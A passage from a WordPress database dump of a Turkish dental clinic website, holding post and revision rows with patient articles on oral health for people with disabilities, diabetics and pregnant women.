yapılmalıdır.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Engellilerde Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'engellilerde-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:41:47', '2018-07-13 10:41:47', '', 0, 'http://www.ze-dent.com/?p=6272', 0, 'post', '', 0),
(6273, 1, '2018-07-13 13:41:40', '2018-07-13 10:41:40', '', 'engellilerde-dis-sagligi', '', 'inherit', 'closed', 'closed', '', 'engellilerde-dis-sagligi', '', '', '2018-07-13 13:41:40', '2018-07-13 10:41:40', '', 6272, 'http://www.ze-dent.com/wp-content/uploads/2018/07/engellilerde-dis-sagligi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6274, 1, '2018-07-13 13:41:47', '2018-07-13 10:41:47', '[vc_row][vc_column][vc_column_text]<strong>Engellilerde görülebilen ağız ve diş sorunları nelerdir?</strong>\r\n\r\nEngelli bireyler, ağız-diş hastalıkları bakımından yüksek risk gurubundadır ve sorunları büyük önem taşır.\r\n<ul>\r\n 	<li>Bu bireylerde beslenme ve çiğneme problemleri yaygındır.</li>\r\n 	<li>Diş kayıpları ile birlikte konuşma problemlerinde artış gözlenir, çocukların eğitimlerinde verim kaybı olur.</li>\r\n 	<li>Hastaların çoğu protez veya diğer apareyleri kullanmaya uyum sağlayamaz.</li>\r\n</ul>\r\n<strong>Engellilerde ağız ve diş sağlığını korumak için neler yapılmalıdır?</strong>\r\n<ul>\r\n 	<li>Beslenme alışkanlıklarına özel dikkat gerekmektedir. Biberonla beslenen engellilerde tüketilen süt, hazır mama ve meyve suları şeker içerdiğinden uzun süre bu tarz beslenme biberon çürüklerine neden olur. Beslenme sonrası su içirilmesi ya da ağzın bir tülbentle temizlenmesi gereklidir. Önlem olarak mümkünse gece beslenmelerinin kaldırılmalıdır.</li>\r\n 	<li>Diş çürüğünün ana nedeni şekerli, asitli, diş ve diş etine kolayca yapışıp kalan besin maddeleridir. Engelliye özel bir diyet önerilmemiş ise bol şeker ve karbonhidrat içeren gıda maddeleri yemek aralarında verilmemeli, bu gıdalar ana öğünlerde tüketilmelidir.</li>\r\n 	<li>Püre tarzında, yumuşak gıdalarla beslenmek zorunda kalan engellilerde diş fırçalama yapılamıyorsa yemek sonrası ağız çalkalatılmalı ya da gıda artıkları silinerek temizlenmelidir.</li>\r\n 	<li>Şurup formundaki ilaçların çoğu şeker içerdiğinden bu ilaçları sürekli kullananlar ağız-diş bakımına daha özen göstermelidirler.</li>\r\n 	<li>Dişler daha ağızda görünür görünmez, beslenme aralarında nemli bir tülbent ile temizlenmelidir. İki yaşından sonra küçük ve yumuşak kıllı bir diş fırçası ile diş bakımı yapılmalıdır. Kötü ağız kokusunu önlemek için dilin de fırçalanması gereklidir. Özel üç yüzlü fırçalar ve elektrikli diş fırçaları kullanım kolaylığı açısından önerilmektedir.</li>\r\n 	<li>Diş çürüğünü önlemek amacıyla flor uygulamaları yapılmalıdır. Engelli bireyler için tablet formları veya diş hekiminin uygulayabileceği jel formları tercih edilir.</li>\r\n 	<li>Kalıcı dişler sürdükten sonra dişlerin çiğneme yüzeylerine diş hekimi tarafından fissür örtücü cilalar uygulanmalıdır.</li>\r\n 	<li>Güven ilişkisi açısından mümkünse hasta takibi aynı diş hekimi tarafından yapılmalıdır.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Engellilerde Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6272-revision-v1', '', '', '2018-07-13 13:41:47', '2018-07-13 10:41:47', '', 6272, 'http://www.ze-dent.com/6272-revision-v1/', 0, 'revision', '', 0),
(6275, 1, '2018-07-13 13:44:30', '2018-07-13 10:44:30', '[vc_row][vc_column][vc_column_text]<strong>Diyabetlilerde görülebilen ağız diş problemleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Diyabetli hastalardaki yüksek kan şekeri seviyesi, kan damarlarında kalınlaşmaya ve tıkanmaya neden olduğundan kanın oksijen taşıma kapasitesi azalır ve dokuların beslenmesi olumsuz yönde etkilenir. Bu durum dişetlerinin iltihaplanmaya karşı direncini düşürür. Dişeti iltihabı, dişetlerinin dişlerden ayrılmasına neden olur. Zaman içinde diş ile dişeti arasında oluşan küçük cepler, yeni bakteri odaklarının gelişmesini sağlar ve diş kayıpları yaşanabilir. Bu süreçte hasta dişlerde sallanma ve ağrının yanı sıra, dişetlerinde kanama ve ağızda aseton kokusu hisseder. Aynı zamanda ağız içindeki enfeksiyonlar, şeker kontrolünü de güçleştirir ve olay bir kısır döngü halini alır.</li>\r\n 	<li>Özellikle kan şekeri kontrolsüz seyreden diyabetlilerde, tükürükteki yüksek şeker seviyesi, bakterilerin yerleşmesine ve üremesine zemin hazırlayarak çürükler ortaya çıkar.</li>\r\n 	<li>Bu gruptaki hastalarda tükürük salgısının koyulaşması ve miktarının azalması nedeni ile tükürüğün dişleri yıkayıcı ve çiğnemeyi kolaylaştırıcı etkisi kaybolur. Tükürük azlığı plak gelişimine ve sonrasında diş taşlarının oluşmasına yol açabilir. Ağız kuruluğu hastanın ağrı hissetmesine, yaraların iyileşmesinin gecikmesine, iltihaplanmanın artmasına ve bunların sonucunda diş kayıplarına kadar gidebilir.</li>\r\n 	<li>Diyabetli hastalar tükürüklerindeki şeker nedeniyle ağızda mantar enfeksiyonlarına açıktır. Bu sorun, dudakların birleşim yerinde çatlak ve kızarıklıklar halinde kendini belli eder.</li>\r\n</ul>\r\n<strong>Diyabetlilerdeki diş ve dişeti problemleri nasıl önlenebilir?</strong>\r\n<ul>\r\n 	<li>Dişeti hastalıkları önlenmesi için her şeyden önce iyi bir şeker kontrolünün sağlanması ve düzenli ağız bakımı gereklidir.</li>\r\n 	<li>Dişler günde en az iki defa, 2 dakika fırçalanmalıdır. (Şeker hastalarında ara öğünlerin de bulunması nedeniyle fırçalama sayısının artışı gerekebilir.) Yumuşak fırça kullanılmalı, dilin üzeri de temizlenmelidir.</li>\r\n 	<li>Diş aralarındaki bakterileri uzaklaştırmak için günde en az bir defa diş ipi kullanılmalı, işlem sonrası ağız su ile çalkalanmalıdır.</li>\r\n 	<li>Yaygın çürüğü ve dişeti sorunları olan hastalarda fluoridli ve klorheksidinli gargaralar kullanılmalıdır.</li>\r\n 	<li>Ağız kuruluğunun önüne geçilemiyor ise ağız sık sık çalkalanmalı veya diş hekiminin tavsiye edeceği yapay tükürük preparatları kullanılmalıdır.</li>\r\n 	<li>Sigara kullanımı ve protezlerin gece ağızdan çıkarılmaması mantar gelişimini hızlandırabilir. Bu nedenle protezlerin temizliğine dikkat edilmeli ve geceleri de mutlaka çıkarılmalıdır. Sigara kullanılmamalıdır.</li>\r\n 	<li>Ağız sağlığını korumak için diş fırçalamak ve diş ipi kullanmanın yanı sıra her altı ayda bir mutlaka diş hekimi kontrolünden geçilmek gereklidir.</li>\r\n</ul>\r\n<strong>Diyabet hastalığı diş ve dişeti tedavisine engel oluşturur mu?</strong>\r\n<ul>\r\n 	<li>Diyabetin kendisi ve insülin kullanımı, ağız içi müdahaleler için kesinlikle bir engel ya da tehlike oluşturmaz. Ancak diyabetli hastalar diş hekimine gitmeden bir gün önce mutlaka açlık kan şeker seviyelerini ölçtürmeli ve bu bilgiyi diş hekimine bildirmelidir. (Unutmayın ki, kontrolsüz diyabette yüksek kan şeker seviyelerinde yara iyileşmesi gecikir, iltihaplanmalar şiddetlenir. Herhangi bir cerrahi müdahaleden önce hastanın kan şeker seviyesinin 180 mg / dl’nin altında olması istenir. Kan şeker seviyesinin 180 mg / dl’nin üzerinde olduğu hastalarda ancak acil enfeksiyon müdahaleleri yapılabilir, çünkü enfeksiyon kan şekerini daha da yükseltir.)</li>\r\n 	<li>Ağızda cerrahi bir girişim sonrası 24-48 saat ilaç tedavisi sürdürülmelidir.</li>\r\n 	<li>Ağızda bir sorun ya da çok sayıda çürük dişler mevcutsa bu durumun enfeksiyon odağı yaratarak kan şekerini yükseltebileceğine dikkat edilmeli ve sorunlarla vakit geçirmeksizin mücadele edilmelidir.</li>\r\n 	<li>Diş ve diş eti tedavisi hastalarda stres yaratan bir olgudur. Bu nedenle operasyon öncesi ve sonrasında ağrı kesici ve sakinleştiriciler yararlı olabilir.</li>\r\n 	<li>Bu tip hastaların işlemlerini sabah erken saatlerde lokal anestezi altında yaptırmaları önemlidir. Yapılan tedavi, hastanın beslenme düzenini ve ilaç kullanım saatlerini aksatmamalıdır. Bazı geniş cerrahi müdahalelerde hastanın hekimi ile görüşülerek hem beslenme düzeninde hem de ilaçların dozunda değişiklik yapılabilir. Eğer gerekli ise genel anestezi altında da diş tedavisi yapılabilir.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Diyabetlilerde Ağız ve Diş', '', 'publish', 'closed', 'closed', '', 'diyabetlilerde-agiz-ve-dis', '', '', '2018-07-13 13:44:30', '2018-07-13 10:44:30', '', 0, 'http://www.ze-dent.com/?p=6275', 0, 'post', '', 0),
(6277, 1, '2018-07-13 13:43:12', '2018-07-13 10:43:12', '', 'diyabetlilerde-agiz-sagligi', '', 'inherit', 'closed', 'closed', '', 'diyabetlilerde-agiz-sagligi', '', '', '2018-07-13 13:43:12', '2018-07-13 10:43:12', '', 6275, 'http://www.ze-dent.com/wp-content/uploads/2018/07/diyabetlilerde-agiz-sagligi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6278, 1, '2018-07-13 13:44:30', '2018-07-13 10:44:30', '[vc_row][vc_column][vc_column_text]<strong>Diyabetlilerde görülebilen ağız diş problemleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Diyabetli hastalardaki yüksek kan şekeri seviyesi, kan damarlarında kalınlaşmaya ve tıkanmaya neden olduğundan kanın oksijen taşıma kapasitesi azalır ve dokuların beslenmesi olumsuz yönde etkilenir. Bu durum dişetlerinin iltihaplanmaya karşı direncini düşürür. Dişeti iltihabı, dişetlerinin dişlerden ayrılmasına neden olur. Zaman içinde diş ile dişeti arasında oluşan küçük cepler, yeni bakteri odaklarının gelişmesini sağlar ve diş kayıpları yaşanabilir. Bu süreçte hasta dişlerde sallanma ve ağrının yanı sıra, dişetlerinde kanama ve ağızda aseton kokusu hisseder. Aynı zamanda ağız içindeki enfeksiyonlar, şeker kontrolünü de güçleştirir ve olay bir kısır döngü halini alır.</li>\r\n 	<li>Özellikle kan şekeri kontrolsüz seyreden diyabetlilerde, tükürükteki yüksek şeker seviyesi, bakterilerin yerleşmesine ve üremesine zemin hazırlayarak çürükler ortaya çıkar.</li>\r\n 	<li>Bu gruptaki hastalarda tükürük salgısının koyulaşması ve miktarının azalması nedeni ile tükürüğün dişleri yıkayıcı ve çiğnemeyi kolaylaştırıcı etkisi kaybolur. Tükürük azlığı plak gelişimine ve sonrasında diş taşlarının oluşmasına yol açabilir. Ağız kuruluğu hastanın ağrı hissetmesine, yaraların iyileşmesinin gecikmesine, iltihaplanmanın artmasına ve bunların sonucunda diş kayıplarına kadar gidebilir.</li>\r\n 	<li>Diyabetli hastalar tükürüklerindeki şeker nedeniyle ağızda mantar enfeksiyonlarına açıktır. Bu sorun, dudakların birleşim yerinde çatlak ve kızarıklıklar halinde kendini belli eder.</li>\r\n</ul>\r\n<strong>Diyabetlilerdeki diş ve dişeti problemleri nasıl önlenebilir?</strong>\r\n<ul>\r\n 	<li>Dişeti hastalıkları önlenmesi için her şeyden önce iyi bir şeker kontrolünün sağlanması ve düzenli ağız bakımı gereklidir.</li>\r\n 	<li>Dişler günde en az iki defa, 2 dakika fırçalanmalıdır. (Şeker hastalarında ara öğünlerin de bulunması nedeniyle fırçalama sayısının artışı gerekebilir.) Yumuşak fırça kullanılmalı, dilin üzeri de temizlenmelidir.</li>\r\n 	<li>Diş aralarındaki bakterileri uzaklaştırmak için günde en az bir defa diş ipi kullanılmalı, işlem sonrası ağız su ile çalkalanmalıdır.</li>\r\n 	<li>Yaygın çürüğü ve dişeti sorunları olan hastalarda fluoridli ve klorheksidinli gargaralar kullanılmalıdır.</li>\r\n 	<li>Ağız kuruluğunun önüne geçilemiyor ise ağız sık sık çalkalanmalı veya diş hekiminin tavsiye edeceği yapay tükürük preparatları kullanılmalıdır.</li>\r\n 	<li>Sigara kullanımı ve protezlerin gece ağızdan çıkarılmaması mantar gelişimini hızlandırabilir. Bu nedenle protezlerin temizliğine dikkat edilmeli ve geceleri de mutlaka çıkarılmalıdır. Sigara kullanılmamalıdır.</li>\r\n 	<li>Ağız sağlığını korumak için diş fırçalamak ve diş ipi kullanmanın yanı sıra her altı ayda bir mutlaka diş hekimi kontrolünden geçilmek gereklidir.</li>\r\n</ul>\r\n<strong>Diyabet hastalığı diş ve dişeti tedavisine engel oluşturur mu?</strong>\r\n<ul>\r\n 	<li>Diyabetin kendisi ve insülin kullanımı, ağız içi müdahaleler için kesinlikle bir engel ya da tehlike oluşturmaz. Ancak diyabetli hastalar diş hekimine gitmeden bir gün önce mutlaka açlık kan şeker seviyelerini ölçtürmeli ve bu bilgiyi diş hekimine bildirmelidir. (Unutmayın ki, kontrolsüz diyabette yüksek kan şeker seviyelerinde yara iyileşmesi gecikir, iltihaplanmalar şiddetlenir. Herhangi bir cerrahi müdahaleden önce hastanın kan şeker seviyesinin 180 mg / dl’nin altında olması istenir. Kan şeker seviyesinin 180 mg / dl’nin üzerinde olduğu hastalarda ancak acil enfeksiyon müdahaleleri yapılabilir, çünkü enfeksiyon kan şekerini daha da yükseltir.)</li>\r\n 	<li>Ağızda cerrahi bir girişim sonrası 24-48 saat ilaç tedavisi sürdürülmelidir.</li>\r\n 	<li>Ağızda bir sorun ya da çok sayıda çürük dişler mevcutsa bu durumun enfeksiyon odağı yaratarak kan şekerini yükseltebileceğine dikkat edilmeli ve sorunlarla vakit geçirmeksizin mücadele edilmelidir.</li>\r\n 	<li>Diş ve diş eti tedavisi hastalarda stres yaratan bir olgudur. Bu nedenle operasyon öncesi ve sonrasında ağrı kesici ve sakinleştiriciler yararlı olabilir.</li>\r\n 	<li>Bu tip hastaların işlemlerini sabah erken saatlerde lokal anestezi altında yaptırmaları önemlidir. Yapılan tedavi, hastanın beslenme düzenini ve ilaç kullanım saatlerini aksatmamalıdır. Bazı geniş cerrahi müdahalelerde hastanın hekimi ile görüşülerek hem beslenme düzeninde hem de ilaçların dozunda değişiklik yapılabilir. Eğer gerekli ise genel anestezi altında da diş tedavisi yapılabilir.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Diyabetlilerde Ağız ve Diş', '', 'inherit', 'closed', 'closed', '', '6275-revision-v1', '', '', '2018-07-13 13:44:30', '2018-07-13 10:44:30', '', 6275, 'http://www.ze-dent.com/6275-revision-v1/', 0, 'revision', '', 0),
(6279, 1, '2018-07-13 13:47:49', '2018-07-13 10:47:49', '[vc_row][vc_column][vc_column_text]<strong>Hamilelik, ağız sağlığını nasıl etkiler?</strong>\r\n\r\nHamilelik sırasında normalde olması gereken diş bakımına biraz daha hassasiyet gösterilirse bir problemle karşılaşılmaz. Hamilelik sırasında bebeğin kalsiyum ihtiyacını annenin dişlerinden karşıladığı inancı tamamen yanlıştır. Eğer gıdalarla yeterli kalsiyum alınamazsa bebeğin gelişimi için gerekli olan miktar, annenin kemiklerinden karşılanır. Dişlerden kalsiyum çözünmesi mümkün değildir.\r\n\r\nHamilelik, dişleri olumsuz yönde etkilemez ancak kötü ve bakımsız dişler hamileliği etkiler. Şöyle ki; yapılan araştırmalar diş ve dişeti hastalıklarının erken doğum ve düşük ağırlıklı bebek riskini 3-4 kat artırdığını göstermektedir. Bu nedenle hamileler, ağız bakımlarına ve beslenmelerine dikkat etmelidir.\r\n\r\n<strong>Hamilelik Gingivitisi nedir?</strong>\r\n\r\nHamilelik sırasında ağız sağlığında bazı değişikliklerin olacağı bir gerçektir. En önemli değişiklik östrojen ve progesteron hormon düzeylerindeki artıştır. Bu artış, dişler üzerinde plak birikimine sebep olur ve eğer plak uzaklaştırılmazsa diş eti iltihabı (gingivitis) görülür. Bu duruma ‘hamilelik gingivitisi’ adı verilir.\r\n\r\nHamilelik gingivitisi genellikle, hamileliğin 2. ayında başlayıp, 8. ayında en üst seviyeye çıkar. Ancak daha çok 2. üç aylık dönemde hamile kadınların çoğunluğunu farklı şiddette etkiler. Dişeti kırmızı, hacim olarak artmış, hassas ve kanamalıdır. Eğer gingivitis zaten mevcutsa hamilelik sırasında şiddeti artabilir ve tedavi edilmezse periodontitise ilerleyebilir. Hamile kadınlarda aynı zamanda ‘hamilelik tümörü’ geliştirme riski de vardır. Bunlar dişeti büyümelerinin irritasyonu sonucu oluşan iltihabi lezyonlardır. Genellikle kendi haline bırakılmakla beraber, hastaya rahatsızlık veriyorsa veya çiğneme, fırçalama ve diğer ağız bakımı işlemlerini engelliyorsa dişhekimi tarafından alınmalıdır.\r\n\r\n<strong>Hamilelikte diş problemleri nasıl önlenebilir?</strong>\r\n<ul>\r\n 	<li>Diş eti iltihabı dişlerin etkin olarak bakımı ve temizlenmesi ile önlenebilir. Her gün en az iki kez, mümkün olan durumlarda her yemekten sonra dişler fırçalanmalıdır.</li>\r\n 	<li>Her gün tüm dişlerde diş ipliği ile temizlik işlemi yapılmalıdır.</li>\r\n 	<li>Diş hekiminin önerisi olmadığı sürece ağız gargarası kullanılmamalıdır.</li>\r\n 	<li>Dengeli beslenme ile birlikte C ve B12 vitamin destekleri de ağız sağlığının sürdürülmesi açısından önemlidir.</li>\r\n 	<li>Diş hekimine daha sıklıkla gidilmesi, etkin plak kontrolünü sağlayarak gingivitis gelişimini önler. Plak kontrolünün sağlanması aynı zamanda diş eti irritasyonunu ve hamilelik tümörlerinin oluşma riskini azaltır.</li>\r\n</ul>\r\n<strong>Dişhekimine ne zaman gidilmelidir?</strong>\r\n\r\nHamilelik planlanıyorsa veya hamile olunduğundan şüpheleniliyorsa diş hekimi ziyaret edilmelidir. İlk 3 aylık dönemde temizlik yapılması uygundur. Dişhekimi hamileliğin kalan dönemi için bir tedavi takvimi hazırlayacaktır. İkinci 3 ayda da ağız dokularında meydana gelen değişikliklerin ve ağız bakımının etkinliğinin değerlendirilmesi ile birlikte tekrar temizlik önerilebilir. Duruma göre üçüncü 3 aylık dönemde tekrar randevu verilebilir fakat tüm bu seanslar mümkün olduğunca kısa süreli olmalıdır.\r\n\r\n<strong>Hamilelik sırasında yapılmaması gereken işlemler var mıdır?</strong>\r\n\r\nHamileliğin ilk ve son üç ayında dental tedavi tavsiye edilmemektedir. Gerekli görülen müdahale ikinci üç ay süresince yapılmalıdır. İlk üç ayda bebeğin organ gelişimi sürmekte olduğundan; son üç ayda ise gerekli tedavi pozisyonları anneyi rahatsız edebileceğinden tedavi yapılmamaktadır. Herhangi bir diş tedavisi için en uygun zaman 4. ve 6. aylar arasıdır. Şiddetli ağrının eşlik ettiği acil durumlarda tedavi hamileliğin herhangi bir döneminde yapılabilir. Anestezi ve ilaç verilmesini gerektiren durumlarda jinekolog ile irtibat kurulmalıdır. Ertelenebilecek işlemler doğumdan sonraya bırakılmalıdır.\r\n\r\n<strong>Hamilelikte diş röntgeni zararlı mıdır?</strong>\r\n\r\nBu dönemde dental problemlere bağlı şikayetlerin geçici olarak çözümlenmesi filmsiz de olabilir, asıl tedavi doğumdan sonraya bırakılabilir. Dental tedavinin aşamalarının (kanal tedavisi vb.) takibi için film çekilmesi uygun değildir. Gerektiğinde başarısız tedaviler doğum sonrası tekrarlanmalıdır.\r\n\r\nAnnenin genel sağlığının söz konusu olduğu önemli tablolarda yaklaşım farklı olabilir. Tanı için filmin kaçınılmaz olduğu durumlarda; her ne kadar dişhekimliğinde çekilen röntgenlerde verilen radyasyon miktarı çok az ve karın bölgesine çok yakın değilse de, gelişmekte olan bebeğin ışın almasını önlemek için mutlaka kurşun önlük kullanılması gerekir.\r\n\r\n<strong>Dişler hamilelik sırasında daha çabuk mu çürür?</strong>\r\n\r\nDaha önce de belirtildiği gibi ‘hamilelik döneminde annenin dişlerinden kalsiyum çekildiği ve bu nedenle her bebeğin anneye bir diş kaybettireceği’ inancı kesinlikle doğru değildir.\r\nHamilelik döneminde vücuttaki dengenin bozulması, dişlerin çabuk çürümesine uygun bir ortam yaratır. Bu dönemde dişlerin daha çabuk çürümelerinin nedenleri şunlardır;\r\n<ul>\r\n 	<li>Bebek beslenen dönemde tatlıya, abur cubura aşırı istek belirir ve bunlar yendikten sonra diş fırçalama ihmal edilir</li>\r\n 	<li>İlk aylarda görülen kusmalardan sonra, anne, ağız bakımına yeterince özen göstermeyebilir.</li>\r\n 	<li>Gebelik hormonlarının (östojen, progesteron) etkisi ile diş etleri daha çabuk kanayan anne, dişlerini fırçalamaktan kaçınabilir.</li>\r\n</ul>\r\n<strong>Hamilelikte bebeğin diş sağlığı için alınması gereken önlemler var mıdır?</strong>\r\n\r\nAnne karnında ağız boşluğuna ait oluşum belirtileri 3. haftada görülmesine rağmen, dişlerin gelişimine ait ilk belirtiler 6. haftaya rastlamaktadır. 7.haftadan itibaren dişlerin tomurcukları hafta hafta belirmeye başlar.\r\n\r\nHamilelik döneminde anne hem kendi sağlığı için hem de bebeğinin diş gelişimi için dengeli beslenmeye dikkat etmelidir. Diş sağlığı için protein, A vitamini (et, süt, yumurta, sarı sebze ve meyveler), C vitamini (narenciye, domates, çilek), D vitamini (et, süt, yumurta, balık) ve kalsiyum (süt ve süt ürünleri, yeşil yapraklı sebzeler)’dan zengin gıdaların yeterince alınması gerekir.\r\n\r\nAyrıca bilinçsiz ilaç kullanımından kaçınılmalıdır. Kullanılan ilaçlar bebeğin diş sağlığının yanı sıra genel vücut gelişimini de olumsuz yönde etkileyebilir. Bebeğin diş sağlığı konusunda bilgili olmak, çocuğunuzun ömür boyu sağlıklı dişlere sahip olmasında ilk basamaktır.\r\n\r\n<strong>Hamilelikte antibiyotik kullanmak bebeğin dişlerini etkiler mi?</strong>\r\n\r\nHamilelik döneminde bilinçsiz ilaç kullanımından kaçınılması gerektiğini belirtmiştik. Zaten hamilelikte kullanılan her türlü ilacın anne adayını takip eden doktorun kontrolünde kullanılması gerektiği unutulmamalıdır. Bu dönemde antibiyotik kullanılması gerekiyorsa ‘tetrasiklinler’ kullanılmamalıdır. Bu grup antibiyotikler ‘tetrasiklin renklenmesi’ denilen geri dönüşümü olmayan renk değişimlerine neden olurlar. Her antibiyotiğin bebeğin dişlerinde lekelenmelere neden olduğu kanısı yanlıştır. Bunun dışındaki antibiyotiklerin, penisilin ve türevlerinin renklenme yaptığına dair bilimsel bir veri yoktur.[/vc_column_text][/vc_column][/vc_row]', 'Hamilelikte Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'hamilelikte-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:47:49', '2018-07-13 10:47:49', '', 0, 'http://www.ze-dent.com/?p=6279', 0, 'post', '', 0),
(6280, 1, '2018-07-13 13:45:58', '2018-07-13 10:45:58', '', 'hamilelikte-agiz-sagligi', '', 'inherit', 'closed', 'closed', '', 'hamilelikte-agiz-sagligi', '', '', '2018-07-13 13:45:58', '2018-07-13 10:45:58', '', 6279, 'http://www.ze-dent.com/wp-content/uploads/2018/07/hamilelikte-agiz-sagligi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6281, 1, '2018-07-13 13:47:49', '2018-07-13 10:47:49', '[vc_row][vc_column][vc_column_text]<strong>Hamilelik, ağız sağlığını nasıl etkiler?</strong>\r\n\r\nHamilelik sırasında normalde olması gereken diş bakımına biraz daha hassasiyet gösterilirse bir problemle karşılaşılmaz. Hamilelik sırasında bebeğin kalsiyum ihtiyacını annenin dişlerinden karşıladığı inancı tamamen yanlıştır. Eğer gıdalarla yeterli kalsiyum alınamazsa bebeğin gelişimi için gerekli olan miktar, annenin kemiklerinden karşılanır. Dişlerden kalsiyum çözünmesi mümkün değildir.\r\n\r\nHamilelik, dişleri olumsuz yönde etkilemez ancak kötü ve bakımsız dişler hamileliği etkiler. Şöyle ki; yapılan araştırmalar diş ve dişeti hastalıklarının erken doğum ve düşük ağırlıklı bebek riskini 3-4 kat artırdığını göstermektedir. Bu nedenle hamileler, ağız bakımlarına ve beslenmelerine dikkat etmelidir.\r\n\r\n<strong>Hamilelik Gingivitisi nedir?</strong>\r\n\r\nHamilelik sırasında ağız sağlığında bazı değişikliklerin olacağı bir gerçektir. En önemli değişiklik östrojen ve progesteron hormon düzeylerindeki artıştır. Bu artış, dişler üzerinde plak birikimine sebep olur ve eğer plak uzaklaştırılmazsa diş eti iltihabı (gingivitis) görülür. Bu duruma ‘hamilelik gingivitisi’ adı verilir.\r\n\r\nHamilelik gingivitisi genellikle, hamileliğin 2. ayında başlayıp, 8. ayında en üst seviyeye çıkar. Ancak daha çok 2. üç aylık dönemde hamile kadınların çoğunluğunu farklı şiddette etkiler. Dişeti kırmızı, hacim olarak artmış, hassas ve kanamalıdır. Eğer gingivitis zaten mevcutsa hamilelik sırasında şiddeti artabilir ve tedavi edilmezse periodontitise ilerleyebilir. Hamile kadınlarda aynı zamanda ‘hamilelik tümörü’ geliştirme riski de vardır. Bunlar dişeti büyümelerinin irritasyonu sonucu oluşan iltihabi lezyonlardır. Genellikle kendi haline bırakılmakla beraber, hastaya rahatsızlık veriyorsa veya çiğneme, fırçalama ve diğer ağız bakımı işlemlerini engelliyorsa dişhekimi tarafından alınmalıdır.\r\n\r\n<strong>Hamilelikte diş problemleri nasıl önlenebilir?</strong>\r\n<ul>\r\n 	<li>Diş eti iltihabı dişlerin etkin olarak bakımı ve temizlenmesi ile önlenebilir. Her gün en az iki kez, mümkün olan durumlarda her yemekten sonra dişler fırçalanmalıdır.</li>\r\n 	<li>Her gün tüm dişlerde diş ipliği ile temizlik işlemi yapılmalıdır.</li>\r\n 	<li>Diş hekiminin önerisi olmadığı sürece ağız gargarası kullanılmamalıdır.</li>\r\n 	<li>Dengeli beslenme ile birlikte C ve B12 vitamin destekleri de ağız sağlığının sürdürülmesi açısından önemlidir.</li>\r\n 	<li>Diş hekimine daha sıklıkla gidilmesi, etkin plak kontrolünü sağlayarak gingivitis gelişimini önler. Plak kontrolünün sağlanması aynı zamanda diş eti irritasyonunu ve hamilelik tümörlerinin oluşma riskini azaltır.</li>\r\n</ul>\r\n<strong>Dişhekimine ne zaman gidilmelidir?</strong>\r\n\r\nHamilelik planlanıyorsa veya hamile olunduğundan şüpheleniliyorsa diş hekimi ziyaret edilmelidir. İlk 3 aylık dönemde temizlik yapılması uygundur. Dişhekimi hamileliğin kalan dönemi için bir tedavi takvimi hazırlayacaktır. İkinci 3 ayda da ağız dokularında meydana gelen değişikliklerin ve ağız bakımının etkinliğinin değerlendirilmesi ile birlikte tekrar temizlik önerilebilir. Duruma göre üçüncü 3 aylık dönemde tekrar randevu verilebilir fakat tüm bu seanslar mümkün olduğunca kısa süreli olmalıdır.\r\n\r\n<strong>Hamilelik sırasında yapılmaması gereken işlemler var mıdır?</strong>\r\n\r\nHamileliğin ilk ve son üç ayında dental tedavi tavsiye edilmemektedir. Gerekli görülen müdahale ikinci üç ay süresince yapılmalıdır. İlk üç ayda bebeğin organ gelişimi sürmekte olduğundan; son üç ayda ise gerekli tedavi pozisyonları anneyi rahatsız edebileceğinden tedavi yapılmamaktadır. Herhangi bir diş tedavisi için en uygun zaman 4. ve 6. aylar arasıdır. Şiddetli ağrının eşlik ettiği acil durumlarda tedavi hamileliğin herhangi bir döneminde yapılabilir. Anestezi ve ilaç verilmesini gerektiren durumlarda jinekolog ile irtibat kurulmalıdır. Ertelenebilecek işlemler doğumdan sonraya bırakılmalıdır.\r\n\r\n<strong>Hamilelikte diş röntgeni zararlı mıdır?</strong>\r\n\r\nBu dönemde dental problemlere bağlı şikayetlerin geçici olarak çözümlenmesi filmsiz de olabilir, asıl tedavi doğumdan sonraya bırakılabilir. Dental tedavinin aşamalarının (kanal tedavisi vb.) takibi için film çekilmesi uygun değildir. Gerektiğinde başarısız tedaviler doğum sonrası tekrarlanmalıdır.\r\n\r\nAnnenin genel sağlığının söz konusu olduğu önemli tablolarda yaklaşım farklı olabilir. Tanı için filmin kaçınılmaz olduğu durumlarda; her ne kadar dişhekimliğinde çekilen röntgenlerde verilen radyasyon miktarı çok az ve karın bölgesine çok yakın değilse de, gelişmekte olan bebeğin ışın almasını önlemek için mutlaka kurşun önlük kullanılması gerekir.\r\n\r\n<strong>Dişler hamilelik sırasında daha çabuk mu çürür?</strong>\r\n\r\nDaha önce de belirtildiği gibi ‘hamilelik döneminde annenin dişlerinden kalsiyum çekildiği ve bu nedenle her bebeğin anneye bir diş kaybettireceği’ inancı kesinlikle doğru değildir.\r\nHamilelik döneminde vücuttaki dengenin bozulması, dişlerin çabuk çürümesine uygun bir ortam yaratır. Bu dönemde dişlerin daha çabuk çürümelerinin nedenleri şunlardır;\r\n<ul>\r\n 	<li>Bebek beslenen dönemde tatlıya, abur cubura aşırı istek belirir ve bunlar yendikten sonra diş fırçalama ihmal edilir</li>\r\n 	<li>İlk aylarda görülen kusmalardan sonra, anne, ağız bakımına yeterince özen göstermeyebilir.</li>\r\n 	<li>Gebelik hormonlarının (östojen, progesteron) etkisi ile diş etleri daha çabuk kanayan anne, dişlerini fırçalamaktan kaçınabilir.</li>\r\n</ul>\r\n<strong>Hamilelikte bebeğin diş sağlığı için alınması gereken önlemler var mıdır?</strong>\r\n\r\nAnne karnında ağız boşluğuna ait oluşum belirtileri 3. haftada görülmesine rağmen, dişlerin gelişimine ait ilk belirtiler 6. haftaya rastlamaktadır. 7.haftadan itibaren dişlerin tomurcukları hafta hafta belirmeye başlar.\r\n\r\nHamilelik döneminde anne hem kendi sağlığı için hem de bebeğinin diş gelişimi için dengeli beslenmeye dikkat etmelidir. Diş sağlığı için protein, A vitamini (et, süt, yumurta, sarı sebze 